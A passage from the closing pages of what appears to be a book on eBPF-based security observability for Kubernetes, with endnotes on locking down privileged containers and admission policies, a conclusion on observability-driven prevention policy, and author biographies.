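    - ALL                           # drop every capability, then re-add only what is needed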
11 A privileged container is able to access and manipulate any devices on a host, thanks to being granted the CAP_SYS_ADMIN capability.
12 Admission controllers are an essential security tool to build out a security policy for Kubernetes objects.
13 In the video “The Hitchhiker’s Guide to Container Security”, we use OPA to block dangerous pod configurations.
14 Here is an example prevention policy for privileged pods.
17 Ian Coldwater and Brad Geesaman discuss several attack vectors on Kubernetes clusters in this recording. It is required viewing for defenders.
18 Layer 7 network policy examples can be found on the Cilium site.
19 These include hostPID, hostIPC, hostNetwork, hostPorts, and allowedHostPaths. The Kubernetes documentation explicitly calls out that host resources are a known source of privilege escalation and should be avoided.
21 The Cilium CNI provides network observability via Hubble, which can also be used to create observability-driven policy.
Data-Driven Security
Now that we’ve locked down our environment to prevent this attack, we recommend that you continue to make continuous observations and improvements to your security posture with security observability. Preventing an attack starts with detecting it, and ensuring you have high-fidelity security observability to detect malicious behavior also ensures you have the inputs for making ongoing improvements to your prevention policy. This data-driven workflow to create and continuously improve your security is the most crucial part of observability-driven policy.

We hope you’ve enjoyed this short journey into the world of security observability and eBPF. It is the technology we’ve always wanted when in the trenches of threat detection and security engineering, due to its fully customizable, in-kernel detection and prevention capabilities. It’s an incredibly exciting time for eBPF as it’s gone from an emerging Linux kernel technology to one of the hottest new tools in distributed computing and infrastructure technology.
As more companies are shifting to containers and cloud native infrastructure, securing Kubernetes environments has never been more critical. Security observability in cloud native environments is the only data you need to create a least-privilege configuration for your workloads, rapidly threat hunt across your entire environment, or detect a breach or compromise.

Containers are implemented as namespaces, capabilities, and cgroups in the Linux kernel, and eBPF operates natively in the kernel, natively supporting container visibility. eBPF dynamically configures security observability and prevention policy enforcement for all workloads in a cluster without any restart or changes to your applications or infrastructure. eBPF gives security teams an unmatched level of visibility into their workloads via several hook points in the kernel, including process execution, network sockets, file access, and generic kprobes and uprobes. This security observability enables full visibility of the four golden signals of container security.

Because eBPF operates natively in the kernel, we can also gain visibility and create prevention policy for the underlying Kubernetes worker node, providing detection in depth for your cloud native environment. With visibility across the full MITRE ATT&CK framework, security observability is the only data point you need to objectively understand the security of your environment.
eBPF isn’t just about observability; it also creates an improved prevention policy and framework over traditional security tools. When developing a policy, it’s critical that you use security observability to create a prevention policy based on observed application behavior. Testing your policies for safety from outages in a development or staging environment follows DevOps/SRE best practices.

If you have a team that isn’t well-versed in security or is wondering how to get started, participating in CTFs and red team assessments is a great way to learn the techniques of an attack while generating eBPF events that represent the behaviors of real-world attacks. These events can be applied to generate prevention policies across the spectrum of the MITRE framework for a defense-in-depth approach to securing your workloads.

The future of eBPF is still uncharted, but if we peer into the future we might see a world where BPF logic is just a logical part of an application. In this model, your application comes with some BPF code, and while technically it’s extending the kernel in some sense, it’s extending the functionality of the application to react to events in a way that doesn’t require a kernel extension. One thing we can be sure of is that eBPF for security is just getting started.
About the Authors
Jed Salazar is passionate about engineering trustworthy distributed systems. His journey led him to work as an SRE on Borg clusters and security engineering for Alphabet companies at Google. Since then he’s worked with some of the most sophisticated Kubernetes environments in the world, advocating defense-in-depth security from the supply chain to container runtime. In his free time, he enjoys trail running with dogs in the mountains and touring the west in a van with his partner.

Natalia Reka Ivanko is a security engineer with a strong background in container and cloud native security. She is passionate about building things that matter and working with site reliability and software engineers to develop and apply security best practices. She is inclined towards innovative technologies like eBPF and Kubernetes, loves being hands-on, and is always looking for new challenges and growth. She is a big believer in open source and automation. In her free time she loves flying as a private pilot, experiencing outdoor activities like surfing and running, and getting to know new cultures.